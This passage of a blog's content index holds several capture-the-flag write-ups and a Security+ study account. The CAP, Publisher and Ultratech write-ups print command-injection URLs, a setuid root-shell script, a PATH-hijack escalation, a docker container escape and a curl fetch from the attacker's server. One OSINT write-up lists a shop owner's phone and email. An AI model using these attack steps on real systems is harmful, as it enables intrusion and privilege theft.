linpeas.sh./linpeas.shThe Linpeas output points us toward the /opt directory and a specific file.\nLooking through I see /opt and run_container.sh file there\ncd /optWe check for SUID binaries and find the binary corresponding to the script.\nSeeing the permissions we try to find SUID binaries:\nfind / -perm /4000 2\u0026gt;/dev/nullAnd here we see: /usr/sbin/run_container\nWe use the strings utility to inspect the binary and the associated script, revealing the execution path.\nstrings run_container.shWe see the code\nstrings /usr/sbin/run_containerHere I see /bin/bash and /opt/run_container.sh\nPhase 3: Privilege Escalation via SUID ContainerThe run_container binary is a custom-made SUID wrapper that executes /opt/run_container.sh.\nBy checking the strings output, we see it references /bin/bash, which can be exploited by placing a malicious executable with that name in a PATH-preceding directory.\ncd /run/user/1000ls./bashcd /optrun_containerWe interrupt the script’s execution to gain control of the environment.\nctrl+cls /tmpand we see bashWe execute the newly visible bash shell with the -p flag to maintain the elevated permissions granted by the SUID binary.\n/tmp/bash -pwhoamicd /rootcat root.txtAnd we get the root flag:\n3a4225cc9e85709adda6ef55d6a4f2caCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"6 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/publisher-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"PUBLISHER- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner rated OSINT room from the TryHackMe platform titled “SEARCH LIGHT IMINT” SEARCH LIGHT IMINT- TRY HACK ME- ROOMHello everyone! This is a beginner rated OSINT room from the TryHackMe platform titled “SEARCH LIGHT IMINT”\nThis room is classified as easy and is an OSINT type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Locating European LandmarksTarget 1: Carnaby Street (London)We begin the investigation by downloading and examining the first resource file provided.\nStart by downloading the resource file providedThe first thing I see is Carnaby StreetAnd on the right I see a Make Up StoreThese two specific details provide high-confidence location identifiers. We use this information for an online search.\nSearching up with these details onlineWe find that it’s in LondonAnd the exact image is even here: https://www.ldnfashion.com/features/carnaby-street-10-fascinating-facts-never-knew/Target 2: Piccadilly Circus Tube Station (London)For the next image, external knowledge and visual recognition provide the initial hint.\nNext, I see the image and get the hint it has something to do with London because I’ve seen many similar points like the design and logo in many music videosSearching with these visual clues, we confirm the location and gather its details:\nSearching it up I confirm it’s in London, Piccadilly Circus, opened in 1906, 4 platformshttps://www.wikiwand.com/en/articles/Piccadilly_Circus_tube_stationPhase 2: International and Business LocationsTarget 3: Vancouver International Airport (Canada)The third image contains a clear three-letter code that acts as an immediate identifier.\nNext, I open the image and see YVRKnowing the airport code I immediately think of Vancouver, CanadaWe confirm this using an image search to gather regional details:\nI confirm it by using the image search and yes it’s in Vancouverit’s Vancouver International Airport, Canada, Richmond CityTarget 4: The Wee Coffee Shop (Scotland)The next image includes a hint that mentions Scotland, prompting us to focus our attention on visible signage.\nNext, I see the image and the hint mentions ScotlandI see the banner of a shop opposite to the coffee shop: The Edinburgh Woolen MillUsing the banner name, we perform a reverse search that leads us directly to the coffee shop’s social media presence:\nA simple reverse search leads me to identifying the place and heading to their facebook page I get the detailsIt’s in Blairgowrie City, Allan Street, phone: +447878 839128, email: theweecoffeeshop@aol.com, owners: Debbie and David CochraneTarget 5: Katz’s Deli (New York City)The fifth target is identified through reverse image searching and requires correlation with a specific person.\nNext, I do the usual reverse image searchI see a lot of images saying it’s: Katz’s DeliWe then search for the required name to confirm the correlation:\nSearching up for bon bon appetit editor working there: Andrew KnowltonTarget 6: Rudolph the Chrome Nosed Reindeer (College Sculpture)The image structure suggests a college or apartment setting due to the architecture visible behind the statue.\nNext, as it looks, I think it’s in a college because of the dorm structure or apartments behind the statueA reverse search identifies the specific statue and its creator:\nReverse searching the imageIt is taken by: Kjersti StensrudIt is called: Rudolph the Chrome Nosed ReindeerPhase 3: Advanced Geospatial CorrelationTarget 7: Lady Justice Statue and Westin Hotel (Alexandria, VA)The final two targets require detailed map correlation using a 360-degree view. We begin with the statue.\nNext, I reverse search this image and I find out it’s about justice but similar statues are located in multiple locations around the worldGoing through multiple imagesI find an exact match because of the reflection in the imageThe specific details allow us to pinpoint the exact statue and courthouse building:\nIt’s called: Lady Justice, building location: Albert V. Bryan United States Courthouse in Alexandria, VirginiaTo find the building opposite the courthouse, we use the map’s 360-degree view feature.\nTo find the opposite building I use 360 view on maps and I see a WestInnClick on it: The Westin Alexandria Old TownTarget 8: Novotel Singapore Clarke Quay (Singapore)The final file is a video, which provides clear geographical clues based on the surrounding landmarks.\nNext, I click on the file and it’s a videoI immediately know it’s Singapore seeing the Marina Bay Hotel with the famous infinity poolWe list all surrounding landmarks visible in the video for correlation:\nBeing somewhat familiar with Singapore, another hint is it’s near and facing the riverside point (east), a massive chunk of greenery (west), facing Clarke Quay Central (north) \u0026amp; Marina Hotel (north), Mandarin Hotel (north-west)Using Riverside Point as a reference, we use the 360-degree map view to position ourselves and identify the building from which the high-angle video was shot:\nUsing 360 views I use river point as the reference and position myself in a way that on my east is Riverside PointRight at the position there is a high-rise building and it’s Hotel NovotelThe architectural details of the source building are then confirmed against the hotel:\nfrom the video we know it was taken from a multi-story building and at a higher point and I even noticed the brown walls/bricks which resembled the same hence the hotel is: Novotel Singapore Clarke QuayCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"30 November 2025","externalUrl":null,"permalink":"/writeups/tryhackme/search-light-imint-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"SEARCH LIGHT IMINT- TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly room from the Hack The Box platform titled “CAP” CAP -HACK THE BOX- ROOMHello everyone! This is a beginner-friendly room from the Hack The Box platform titled “CAP”\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Initial Foothold via Network Analysis (PCAP)Web Reconnaissance and Packet Capture DiscoveryWe begin by navigating to the victim IP address in a browser and observe the main dashboard.\nWe then look through the available options on the left sidebar.\nThe presence of the “pcap” title immediately suggests a network analysis vector, but it shows 0 packets.\nThis indicates the main link is not the path, so we look for directory traversal.\nTraversing through 2 -\u0026gt; 1 -\u0026gt; 0\nWe see see /data/0 shows packet capture and we download the file and open it with wireshark.\nCredentials Extraction from PCAPWe scroll through the pcap file, looking for cleartext traffic or credentials transmitted over unencrypted protocols.\nScrolling through the pcap we see username nathan (same as what we saw in the dashboard) and below we see the credentials\nSuccess! We recover the login credentials:\nUsername: nathanPassword: Buck3tH4TF0RM3!User Flag Retrieval via SSHOur initial rustscan showed the SSH port was open\nWe use the newly acquired credentials to login to SSH:\nssh nathan@\u0026lt;VICTIM_IP\u0026gt;# Password: Buck3tH4TF0RM3!ls -la cat user.txtcc170d72081dbfbdb0235885765c281ePhase 2: Privilege Escalation via SUID Python ExploitSUID/Permissions CheckThe first step in privilege escalation is checking if our current user can run commands as root using sudo.\nsudo -l # doesn’t get us through hence we can’t see what can be ran as sudoSo we check the permissions on the Python executable:\nls -l $(which python3 2\u0026gt;/dev/null || which python 2\u0026gt;/dev/null)ls -l lists the file information (permissions, owner, size, timestamp, and symlink target if any) for the found Python executable.which python3 2\u0026gt;/dev/nullwhich python3 tries to print the full path of python3 (e.g. /usr/bin/python3).2\u0026gt;/dev/null silences error messages (stderr) from which (so nothing is printed if which fails).|| which python 2\u0026gt;/dev/null If which python3 fails (non-zero exit), the shell runs the right side and tries which python (again with stderr suppressed). This provides a fallback.$( ... )Command substitution: the output (path) from the inner command(s) is inserted into the outer command.In simple words: finds the Python binary \u0026amp; shows its permissions and if symlink target is SUID root or writable by an unprivileged user for exploitation\nThe output shows:\n/usr/bin and lrwxrwxrwx 1 root root 9 Mar 13 2020 /usr/bin/python3 -\u0026gt; python3.8\nPython Exploit ExecutionWe will now create a short Python script designed to elevate the effective user ID to 0 (root) and spawn a new shell.\nnano exp.pyWe paste the following exploit code into exp.py:\nimport os os.setuid(0) os.system(“/bin/bash”)# loads Python’s OS interface module\n# set id to root\n# spawns a shell (/bin/bash) as a child process\nThen we can execute it:\npython3 exp.pyBOOM! we get Root\nNow we escalate and get root.txt flag\ncd /root cat root.txt# c59116a937946a389f64420bc079d166CONCLUSION:I hope this write-up walkthrough was helpful to you all!\nI’ve tried a slightly different format and writing style this time, exploring new ways to make things clearer and more concise for you all.Any feedback is more than welcome!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"13 November 2025","externalUrl":null,"permalink":"/writeups/hackthebox/cap-hack-the-box-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"CAP -HACK THE BOX- ROOM","type":"writeups"},{"content":"","date":"13 November 2025","externalUrl":null,"permalink":"/writeups/hackthebox/","section":"Security Labs \u0026 Writeups","summary":"","title":"HackTheBox Machines","type":"writeups"},{"content":" Hello everyone! This is a beginner-friendly somewhat forensic type room from the TryHackMe platform titled “Investigating Windows” INVESTIGATING WINDOWS- TRY HACK ME- ROOMHello everyone! This is a beginner-friendly somewhat forensic type room from the TryHackMe platform titled “Investigating Windows”\nThis room is classified as easy and is a Ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nNot a huge windows user now, but childhood Nostalgia hits different seeing thisPhase 1: Setup and Initial Access (RDP)Establishing RDP ConnectionTo begin the investigation, we first need to establish a Remote Desktop Protocol (RDP) connection to the target Windows machine.\nWe start by ensuring our attacking machine is set up correctly for RDP by installing and starting the xrdp service.\nsudo apt update \u0026amp;\u0026amp; upgradesudo apt install xrdp -y update-rc.d xrdp enable service xrdp startIf you encounter an error, check if the default RDP port (3389) is already in use, kill the process, and restart the service:\nsudo lsof -i :3389 sudo kill \u0026lt;PID\u0026gt; (#use your PID accordingly)sudo systemctl start xrdpsudo systemctl status xrdpOnce the service is verified as running, we use rdesktop to connect to the target IP as the Administrator user, using the credentials provided by the room (which were known for initial access):\nrdesktop -u Administrator -p ‘letmein123!’ 10.201.84.31 # and we get to see it in our screenPhase 2: System Reconnaissance and User AnalysisInitial System Information GatheringUpon gaining RDP access, we head to PowerShell to gather initial system information, specifically to find the version of Windows running.\nsysteminfoWe see : Windows Server 2016\nAs soon as we run this command, we notice a notepad file opening in the background, which is a sign of concurrent user activity or a triggered process.\nUser Logins and Compromise DateNext, we investigate who the users are and when they last logged in to determine the attacker’s path.\nnet user # we see jeny \u0026amp; johnnet user jenny # shows nevernet user john # shows 3/2/2019 5:48:32 PMThe last user who logged in was administrator, as that is who we signed in as through RDP.\nWe also found a reference to the IP 10.34.2.3 in a small pop-up alert when initializing the RDP connection, which could be an internal host or C2 server.\nWe check for other administrator-level accounts:\nnet localgroup administrators administrator accounts =\u0026gt; Guest \u0026amp; JennyThroughout these checks, we consistently see the date 3/2/2019 appearing, which suggests this is the likely date of compromise.\nPhase 3: Tracing Attacker ActivityMalicious Scheduled Task AnalysisWe now pivot to the Task Scheduler to look for persistence mechanisms.\nGo to task scheduler\nThen double click on task schedule library then we then see some task\nLooking at each task and its actions, we identify a suspicious task named clean file system.\nLooking at each of them and actions:\nWe see clean file system\nit has a nc going on -\u0026gt; \\nc.ps1 -l 1348 using a powershel script for a diiferent port which is shady\nThis task was running a PowerShell script to start a Netcat listener.\nFile it was trying to run daily is: \\nc.ps1 -l 1348Port used is: 1348We confirm that Jenny last logged in “never”, a detail noted during the user enumeration phase.\nEvent Viewer Timeline AnalysisTo pinpoint the exact moment special privileges were given (a key action in a compromise), we use the Event Viewer.\ngo to event viewer -\u0026gt; windows log -\u0026gt; security # there are 2,162 eventsWe filter the events using the time hint we found: the date of compromise, 3/2/2019.\nAnd searching up the special privilege code(4672) and using that as a filter\nfiltering using the date event on: 3/2/2019 12AM-11:59PM\nScrolling down we find the exact match : 03/02/2019 4:04:49 PM\nThis timestamp confirms the precise moment the security event occurred.\nViewing it as a text file:\nArtifacts and Persistence CheckWe check the temporary directory for any uploaded tools:\nNext going to TMP folder -\u0026gt; file explorer -\u0026gt; c drive -\u0026gt; tmp -\u0026gt; we see mim file which is the mimikatz file\nNow, for those who are newbies like :p lol:\nNext, we check the etc/hosts file, a common location for malicious redirection:\netc /hosts -\u0026gt; windows c drive -\u0026gt; drivers -\u0026gt; etc -\u0026gt; hostsscrolling down I see the spoofing google attempt lol\nThe hosts file modification is the Command and Control (C\u0026amp;C) mechanism, and the poisoned site was google.com\nWe check for web shell persistence in the web root:\nto check for the shell extension -\u0026gt; go to inetpub -\u0026gt; www -\u0026gt; and we .jsp\nFinally, we look at the firewall rules to find the last port that was opened, which is often used for exfiltration or establishing a new C2 channel:\nNext to find the last opened port -\u0026gt; go to firewall -\u0026gt; inbound -\u0026gt; and the topmost is the latest connection -\u0026gt; port 1337\nCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nThis room was more of a forensic based room on Windows OS and it was fun!\nNow that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"9 November 2025","externalUrl":null,"permalink":"/writeups/tryhackme/investigating-windows-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"INVESTIGATING WINDOWS- TRY HACK ME- ROOM","type":"writeups"},{"content":" Disclaimer: The views and experiences shared in this article are purely my own. The CompTIA Security+ is a certification where opinions on… The Security+ Blueprint: How Hitting the “Stop” instead of“Snooze” Button Forced Me to PassDisclaimer: The views and experiences shared in this article are purely my own. The CompTIA Security+ is a certification where opinions on preparation, resources, and difficulty vary widely. This is simply my candid, personal journey, and if sharing my story helps even one person on their path, I’m genuinely happy.I just earned the CompTIA Security+ certification (SY0–701).\nIt wasn’t some epic battle, but it was personally a long-necessary checkpoint. And if I’m honest, if you told me five weeks ago I’d be writing this, I’d have probably just kept hitting “snooze”.\nMy journey wasn’t the perfect, disciplined march to victory. Oh no, it involved a good dose of last-minute scramble and the cold, hard reality of an expiring exam voucher. (Yes, I actually tried to push an October exam to December. My inner procrastinator is unmatched at times xD.)\nBut here I am, out the other side. This is my journey \u0026amp; my POV of how I got through it and so can you easily!\nHitting the “Stop Button”: Why a Deadline Was My Best Study PlanI don’t have the exact timeline because, frankly, I postponed taking this exam for over 8 months, always coming up with some excuse.\nBut then came the deadline. My voucher was about to expire, and I couldn’t push my exam past October. So, on September 12th after suddenly realizing the issue, I finally scheduled it for the third week of October.\nMy study pattern that followed was, surprisingly, more consistent than my usual last-minute college efforts lol. I didn’t have a fixed time slot. There were days I studied in the most random situations — like being stuck for a solid two hours post-event due to bad weather, just grinding away. Other days, though I had ample time it was just 15 to 30 minutes of going through.\nMy entire plan revolved around one core principle: learning from my mistakes instead of just passively reviewing the material.\nThe Start at 63%. The Test-First, Learn-from-Mistakes StrategyMy preparation truly began on September 15th with my first mock test from Jason Dion Set1 #1.\nThe result? A 63%. Nope this wasn’t a failure; it was nothing but a clear diagnostic.\nHere is how my initial scores broke down across all five domains:\n1.0 General Security Concepts: 50%2.0 Threats, Vulnerabilities, and Mitigations: 65%3.0 Security Architecture: 69%4.0 Security Operations: 72%5.0 Security Program Management and Oversight: 53%This told me exactly where to focus. My approach was always: Test → Identify Mistakes → Study → Test Again.\nI worked through the next 15 days by mid October and after around 15–20 different exams. I hit a familiar plateau around 70–75%.\nAfter pushing through for the next few days, at my final mock, taken just two hours before the exam while watching some NFL.\nI don’t suggest doing this lolI hit 85% for the first and last time. I never hit the “recommended” 95%, but honestly, I’m fine with that.\nLearning Tricks:Having little to no corporate experience, a lot of the governance and policy terms were completely new.\nI remember repeatedly making mistakes just because I couldn’t grasp what the question was asking.\nMy solution was simple: Use analogies. For instance, I kept confusing SOW, MOU, MOA, and MSA.\nHere is how I finally mapped them using the analogy of a professional sports team:\nAn Example of what I used : Mental Mapping of terms for a permanent understandingThis approach ensured I wasn’t just learning them temporarily for the exam, instead understanding the concepts so well you could explain them back to someone.\nMy Prep Stack:Now, for the thing everyone asks: RESOURCES.\nI wanted to keep my preparation focused, avoiding the sprawl of a dozen different books or courses, mainly due to both financial and time constraints.\nThis is what I used and what aligned with my learning style (I’m attaching the link below for you guys).\nThere are various other resources and options available, but these are the ones I felt comfortable with and relied upon:\nJason Dion’s Practice Exams (Udemy): I relied on his Set 1 \u0026amp; Set 2 practice exams primarily. Each set typically offers six mocks of 90 questions. The sheer volume of questions and the detailed explanations I needed for learning from mistakes.https://www.udemy.com/course/comptia-security-sy0-701-practice-exams/?couponCode=25BBPMXNVD35V2\nhttps://www.udemy.com/course/comptia-security-sy0-701-practice-exams-2nd-edition/?couponCode=25BBPMXNVD35V2\nExam Compass Free Quizzes: These were quick, free online quizzes, often structured as 24 separate exams of around 25 questions each. These were great for rapid-fire review and cementing terminologies.https://www.examcompass.com/comptia/security-plus-certification/free-security-plus-practice-tests\nYouTube (The PBQ Pre-Game): I knew the Performance-Based Questions (PBQs) were part of the exam, but I honestly never even looked into them until the day before!I spent time on YouTube with CyberKraft and Networking Guru. They were helpful in giving me a conceptual understanding of what the PBQ interface would look like and how to logically approach the questions.The Exam Day:Oh, the exam wording. CompTIA truly loves playing with words. My key to success was realizing the test structure is less about memorization and more about reading, analyzing, and comprehending the specific technical challenge being presented.\nFor the MCQs: Questions often contain words are absolutely useless — just red herrings to throw you off.\nMy method was to look for the keyword, understand exactly what was being asked, think of the solution in my mind, and then check the options.\nMost questions were surprisingly simple, one-liners, making it easy to spot the hint if you stayed calm. I completed 71 MCQs in a 30-minute blitz.\nFor the PBQs: I was in the same boat as countless others — scratching my head and wondering what to do. I don’t believe there is an official way to perfectly prepare for them (at least I did not find any).\nThe Rule: Flag the PBQs immediately. Complete all multiple-choice questions first. Then, return to the flagged PBQs with a clear, calm mind.The Approach: The solution is pure logical thinking and understanding. Read the question a few times, see what is being mentioned, click around the screen, and explore the interface carefully. Take your time.Pertaining to my personal experience — I had 75 questions (71 MCQs \u0026amp; 4 PBQs) and I was able to complete the entire exam and review in about 60–70 minutes.\nThe Ready Switch:What was the most important habit?\nI’d just say, relax and enjoy the process, and stop allowing your mind to overthink it.\nThe CompTIA exam, in my opinion, is designed not to trick you, but to genuinely test your foundational knowledge, showing they want you to succeed if you put in the conceptual work.\nI wasn’t the right person to talk about burnout because I was trying to postpone the exam! But that feeling when you’re done and everything clears out? It feels good.\nMy final non-negotiable step was that focused revision the day before.\nGoing through all the notes — just the concepts and questions I had repeatedly missed — was what flipped my switch from unsure to ready.\nAnd the end result:Once you are done with the exam, the result appears right when you are done with your testing\nIn my case it took 24 hours to receive the official mail and certificate, which will vary for everyone\nFinal Thoughts:It’s been a fun few weeks, and I genuinely enjoyed this journey of taking up the Security+ exam.\nI have to laud CompTIA ; it does a great job of the baseline knowledge needed in the domain \u0026amp; industry.\nIn my opinion starting with a CompTIA certification, like Security+ or PenTest+ (depending on what aligns with your goals) is a great entry point into the cybersecurity world.\nI truly hope this look into my study journey helps someone else feel less stressed and more prepared.\nThanks for following along my journey!\nI wrote this right after finishing my exam, though it may be published a few days later.\nI’m happy to answer any questions you have about my preparation in the comments below!\nAll the best to everyone planning to take it up — you’ve got this!\n","date":"31 October 2025","externalUrl":null,"permalink":"/articles/certifications/the-security-blueprint-how-hitting-the-stop-instead-of-snooze-button-forced-me-to-pass/","section":"Security Research \u0026 Articles","summary":"","title":"The Security+ Blueprint: How Hitting the “Stop” instead of“Snooze” Button Forced Me to Pass","type":"articles"},{"content":" Hello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ultratech” ULTRATECH -TRY HACK ME- ROOMHello everyone! This is a beginner-friendly room from the TryHackMe platform titled “Ultratech”\nThis room is classified as medium and is a ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nPhase 1: Deep Dive EnumerationInitial Reconnaissance \u0026amp; Port ScanningWe start by performing a swift and aggressive port scan using RustScan to quickly identify open services on the target machine.\nrustscan -a 10.201.74.56 — ulimit 5000The scan quickly reveals the following open ports: 21 (FTP), 22 (SSH), 8081, and 31331.\nNext, we run more detailed Nmap scans on the non-standard ports to determine the exact services and versions running.\nnmap -sC -sV 10.201.74.56 -p 8081nmap -sC -sV 10.201.74.56 -p 31331The Nmap results confirm:\nPort 8081 is running Node.js.Port 31331 is running Apache.The system is a Linux type, specifically Ubuntu.Web Application Analysis: Finding the FootingWith the ports identified, we begin looking for web content.\nI first check the web page at the victim IP, which shows an “UltraTech” landing page.\nAfter scouring common directories (/images, /css, /js), nothing immediately valuable is found.\nPivoting to Gobuster, we scan the Node.js application running on port 8081:\ngobuster dir -u http://10.201.74.56:8081 -w /usr/share/dirb/wordlists/common.txt -t 100This reveals two interesting directories: /auth and /ping.\nMeanwhile, checking the robots.txt file on the root of the site reveals a sitemap:\n/utech_sitemap.txtInside the sitemap, we see references to /index, /what, and /partners.html.\nThe /partners page gives us a login prompt, while /authshows a prompt asking for a specific password.\nA quick look at the login process reveals the URL structure\nhttp://10.201.74.56:8081/auth?login=admin\u0026amp;password=password\nThis structure is a strong indicator that the application processes parameters directly via the URL, making it a prime candidate for injection.\nPhase 2: Initial Foothold via Command InjectionExploiting the ping ParameterThe /ping route is the key.\nIt looks like it uses the standard Linux ping command to check host status, which is a common source of command injection if input isn't properly sanitized.\nWe first confirm that the system responds to our IP:\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150 # (This confirms my system is up)Now for the injection.\nWe use a single quote ' to break out of the command string, a pipe | to chain a new command, and backticks `ls` to execute it.\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150'|'`ls`Success! The output of the ls command is returned, and we see a crucial file: utech.db.sqlite. This is our target!\nDatabase Extraction \u0026amp; Cracking User CredentialsNow we use the same command injection vector to dump the contents of the database file.\nhttp://10.201.74.56:8081/ping?ip=10.9.2.150'|'`cat utech.db.sqlite`The output contains gibberish, which is the raw content of the SQLite file, including two hashed passwords: one for root and one for admin.\nWe take the MD5 hashes and verify them on an online cracker like CrackStation, quickly yielding the credentials:\nroot: n100906admin: mrsheafyPhase 3: Lateral Movement and Privilege EscalationSSH Access \u0026amp; Container IdentificationWith a clear username and password, we attempt to log in via SSH using the root user and the cracked password.\nssh r00t@10.201.74.56# Password: n100906We gain a shell! Inside, we immediately check the users and processes:\ncat /etc/passwd | grep shTo perform a thorough enumeration for privilege escalation vectors, we use linpeas.\nOpen a new tab in the terminal:\npeasscd /usr/share/peass/linpeaspython3 -m http.server (#default port 8000)On the Victim Shell:\ncd /tmpcurl http://10.9.2.150:8000/linpeas.sh -o linpeas.shls (# and we see linpeas.sh is there )chmod +x linpeas.sh./linpeas.shThe output confirms the environment is a Docker container, and we also verify this by checking running images\nContainer Escape: Shell on the HostThe discovery that the docker binary is available and executable is the key to our escape.\nWe pivot to a GTFOBins-style container escape technique.\nWe run a command that mounts the host’s root filesystem (/) into our container at /mnt and then uses chroot to switch our shell's root directory to the host's filesystem, effectively giving us a shell on the host machine.\ndocker run -v /:/mnt — rm -it bash chroot /mnt shWe are now root!!\nWith a root shell on the host, we navigate to the root user’s directory to retrieve the final artifact.\ncd rootls -lacat private.txtAnd it’s nothing significant\nLooking at what is asked I go back and :\ncd .sshls -laI see id_rsa\ncat id_rsaMIIEogIBACONCLUSION:I hope this write-up walkthrough was helpful to you all!\nI’ve tried a slightly different format and writing style this time, exploring new ways to make things clearer and more concise for you all.Any feedback is more than welcome!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"27 October 2025","externalUrl":null,"permalink":"/writeups/tryhackme/ultratech-try-hack-me-room/","section":"Security Labs \u0026 Writeups","summary":"","title":"ULTRATECH -TRY HACK ME- ROOM","type":"writeups"},{"content":" Hello everyone! This is a slightly different room compared to the others. This is a beginner-friendly OSINT room from the TryHackMe… SAKURA ROOM -TRY HACK ME- ROOMHello everyone! This is a slightly different room compared to the others. This is a beginner-friendly OSINT room from the TryHackMe platform titled “Sakura Room”\nThis room is classified as easy and is a OSINT ctf-type challenge. I hope this write-up helps guide you through the process!\nMy goal is to help you understand each step and provide clear explanations so that anyone, whether a beginner or experienced, can follow along and understand the reasoning behind each action. I hope this write-up makes the process smoother and easier to grasp.\nEnough talk — let’s dive right in, and I hope you enjoy the journey! :)\nHecker supremacy xDTask 1 —Task 2 — Image inspection \u0026amp; metadataI start by clicking on the image and inspecting it\nSince I see the binary blobs in the background I feel it has something to do with decoding binary to text.\nSo through inspecting the page I find the Binary and copy paste it in a\nBinary -\u0026gt; Text converter and I get hit with a message to check the metadata\nThe minute I see the word metadata, exif tools spawns in my mind\nI head to the online tool\nView file metadata (EXIF data) onlineEasily view EXIF metadata of images and videos online. Upload files up to 200MB to access camera settings, date…ezgif.comand paste the URL directly and that shows me the file path containing\nSakuraSnowAngelAiko/Task 3 — Find social profile, get real name, PGP to extract emailI go online to the browser and just search up: SakuraSnowAngelAiko and I see the x page( a.k.a Twitter) \u0026amp; Github link\nClicking on the x page and scrolling through I see the introduction post and from there I find the name is :\nAiko AbeNow thinking about the e-mail, I remember seeing the pgp folder.\nThat lead the way to obtain the e-mail\nI copied the pgp content from the public key file and head to the terminal\nNext I create an .asc file :\nnano osi.ascThen I paste the pgp content here and save it\nThen using this command :\ngpg — import osi.ascThis shows me the e-mail:\nSakuraSnowAngel83@protonmail.comTask 4 — Ethereum address \u0026amp; blockchain tracingI remember seeing a repo during the initial search which was called ETH\nSo I head to it and scour throught it, I end up seeing a crypto blockchain id but it feels incorrect even when I searched it up.\nThen seeing the history tab I see the previous update and this leads me to crypto address, this leads me to 2nd subpart answer:\n0xa102397dbeeBeFD8cD2F73A89122fCdB53abB6efNow, through personal knowledge I know ETH stands for\nEthereumit helps me with the initial answer\nNext searchin up the crypto address online I get to see the activity in this website:\nhttps://etherscan.io/txs?a=0xa102397dbeebefd8cd2f73a89122fcdb53abb6ef\nI head straight to the transactions bar and sort it.\nThen scrolling down to 2021 and the specifics mentioned I find the mining pool which is:\nEthermineThrough scrolling I see other type of crypto converted to :\nTether USDand this answers the 4th part of the question.\nTask 5 — Twitter findings, Wi‑Fi \u0026amp; BSSIDNow here to find the answers to the questions, I head back to the x page.\nSince I already know both the x handles answering the username is very easy:\ncurrent handle: @SakuraLoverAikoNow to find the BSSID, I remember seeing on the x page a screenshot with the clue of the wifi details.\nHeading to that post it hints something about deep searching and using a darknet tool(deeppaste)\nBut as I couldn’t find an operating version of tool, by using the hint we see the image in deeppaste v3 and see the home wifi DK1F-G and password Fsdf324T@@\nNow to get through this we use the famed tool: WiGLE\nI create the account and use the advanced search feature and past the SSID value: DK1F-G and query it and that leads me to the BSSID:\n84:AF:EC:34:FC:F8Task 6 — Visual geolocation (landmarks \u0026amp; blossoms)Now for the final set of tasks,\nI head back to the x page and as per the question the image shows a beautiful scenery of cherry blossoms.\nNow taking the image, I simply throw it to Google lens and it automatically showed me the clue about the Okame variety of blossom and the Washington monument in the background.\nThis was a major prompt and by searching the closest airport we see:\nRonald Reagan Airport {DCA}Next, for the layover there is a post and the first thing that catches my eye is the logo and name below(JAL) which confirmed my suspicion that it was Japan Airlines.\nNow with a tiny search I confirmed that it was in the famous:\nHaneda Airport {HND}Next, with it already being in the Japanese region I take one good look at the map and head to Google Maps right away and look at Japan Zoomed out\nI see the unique island structure {I’m referring to Sado Island :)}Quickly zooming in I see the lake and it’s name is:\nLake InawashiroAnd, for the last part to find out which is his home region/city, I head straight back to WiGLE\nAnd in the same page of the SSID where I found the BSSID I see the Map feature and clicking on it I see:\nHirosakiThese are the answers compiled :)\nCONCLUSION:I hope this write-up walkthrough was helpful to you all!\nDoing this room gave me 2 takeaways:\nOSINT though complex is actually funJapan is so beautiful, I have to pay a visit and soak in some the beauty🥹Now that I’ve gotten through it, I hope it helps you and gets you through the room as well. I plan on putting out more like these in the future!\nIf you guys want me to cover any specific room or challenge, or if you have any queries, feel free to drop a comment.\nI’ll check it out and get back to you as soon as I can. Also, you can find all of my writeups and future ones on my GitHub: https://github.com/5kullk3r\nImma bounce for now, but I’ll catch you all in the next writeup!\n","date":"18 October 